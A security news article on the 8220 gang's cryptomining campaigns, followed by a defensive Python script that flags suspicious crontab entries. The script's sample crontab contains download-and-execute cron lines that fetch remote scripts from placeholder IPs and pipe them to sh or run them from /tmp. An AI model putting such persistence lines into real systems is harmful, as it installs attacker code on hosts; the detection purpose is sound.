8220 gang upgraded its TTPs to target the cloud landscape

March 2, 2023

The 8220 gang, one of the most notorious Chinese-speaking cybercriminal groups, has been upgrading its attack capabilities to run cryptocurrency-mining attacks. The group is known for borrowing tactics, techniques, and procedures (TTPs) from other cybercriminal groups such as TeamTNT, WatchDog, and Rocke.

The group is best known for using compromised Docker images and for abusing exposed Struts2, WebLogic, and Redis servers. Researchers have also observed it exploiting vulnerabilities in cloud applications and Linux hosts to spread its botnet and cryptomining campaigns.

The 8220 gang keeps scanning the internet for vulnerable applications.

According to the researchers, the 8220 gang continues to scan for vulnerable internet-facing applications and has changed how it executes its payloads.

In one recent attack the group leveraged vulnerable Oracle WebLogic servers; it has also recently exploited a vulnerable Apache web server.

The group now rotates its C2 IP addresses frequently, a change from earlier campaigns in which it reused the same command-and-control infrastructure. Defenders who rely on static IP blocklists for this group should expect them to go stale quickly and should pair them with behavioural detections on the host.

Researchers also noticed that the threat group used the onacroner script, which the Rocke cryptomining actors have previously utilised.
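Cryptomining loaders of this kind commonly persist through cron entries that periodically re-download and execute a remote script, which is why reviewing crontabs is one of the quickest host-level checks after a suspected 8220 or Rocke infection. The following Python is an added example written for this page, not code from the original article or from the researchers it cites. It flags crontab entries that download remote content and pipe it to a shell, write into scratch directories, fetch from bare IP addresses, or reference hidden files. The crontab contents are constructed for the example; the IP addresses (RFC 5737 documentation ranges) and the onacroner.sh filename in the sample are illustrative only and are not indicators taken from any real campaign.

```python
import re

# Constructed sample crontab (not captured data). Lines 3 and 5 imitate the
# download-and-execute persistence pattern; the rest are ordinary jobs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/10 * * * * (curl -fsSL http://203.0.113.10/onacroner.sh || wget -q -O- http://203.0.113.10/onacroner.sh) | sh
@reboot /usr/local/bin/backup.sh
*/15 * * * * wget -q -O /tmp/.x http://198.51.100.5/x.sh && sh /tmp/.x
30 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b")
SCRATCH_PATH = re.compile(r"/(?:tmp|dev/shm|var/tmp)/")
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b")
HIDDEN_FILE = re.compile(r"/\.[A-Za-z0-9_]+")


def split_entry(line):
    """Split one crontab line into (schedule, command).

    Returns None for blank lines and comments. Handles both the five-field
    schedule and @reboot-style macros.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        parts = line.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    fields = line.split(None, 5)
    if len(fields) < 6:
        return None
    return " ".join(fields[:5]), fields[5]


def analyse_command(command):
    """Return a list of human-readable reasons the command looks suspicious."""
    reasons = []
    has_downloader = bool(DOWNLOADER.search(command))
    if has_downloader and PIPE_TO_SHELL.search(command):
        reasons.append("downloads remote content and pipes it to a shell")
    if has_downloader and SCRATCH_PATH.search(command):
        reasons.append("downloads into a world-writable scratch directory")
    if RAW_IP_URL.search(command):
        reasons.append("fetches from a bare IP address rather than a hostname")
    if HIDDEN_FILE.search(command):
        reasons.append("references a hidden (dot-prefixed) file")
    return reasons


def analyse_crontab(text):
    """Scan crontab text and return one finding per suspicious entry.

    Each finding records the 1-based line number, the schedule, the command
    and the reasons it was flagged, so an analyst can triage quickly.
    """
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = analyse_command(command)
        if reasons:
            findings.append(
                {"line": number, "schedule": schedule,
                 "command": command, "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for finding in analyse_crontab(SAMPLE_CRONTAB):
        print(f"line {finding['line']} [{finding['schedule']}]: {finding['command']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

On a live host, feed the script the output of `crontab -l` for each user together with the contents of `/etc/crontab` and `/etc/cron.d/*`; the heuristics are deliberately simple and will produce false positives on legitimate bootstrap jobs, so treat a hit as a prompt for review rather than a verdict.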

Public cloud environments are a constant target for such groups, and a security research group recently warned of increased 8220 Gang activity against them.

The advisory explained that even a low-skilled group like 8220 Gang can have a large impact on a target with poor security hygiene. The operators' primary goal is to infect poorly configured cloud servers with a custom-built cryptominer and botnet malware.

Infection also exposes the targeted systems to further risk: the same initial access can be reused to install additional malware strains.

The 8220 Gang has continuously upgraded its tactics, techniques, and procedures to evade attribution and security detections. Organisations should invest in hardening their cloud environments to thwart campaigns such as DDoS and cryptomining.
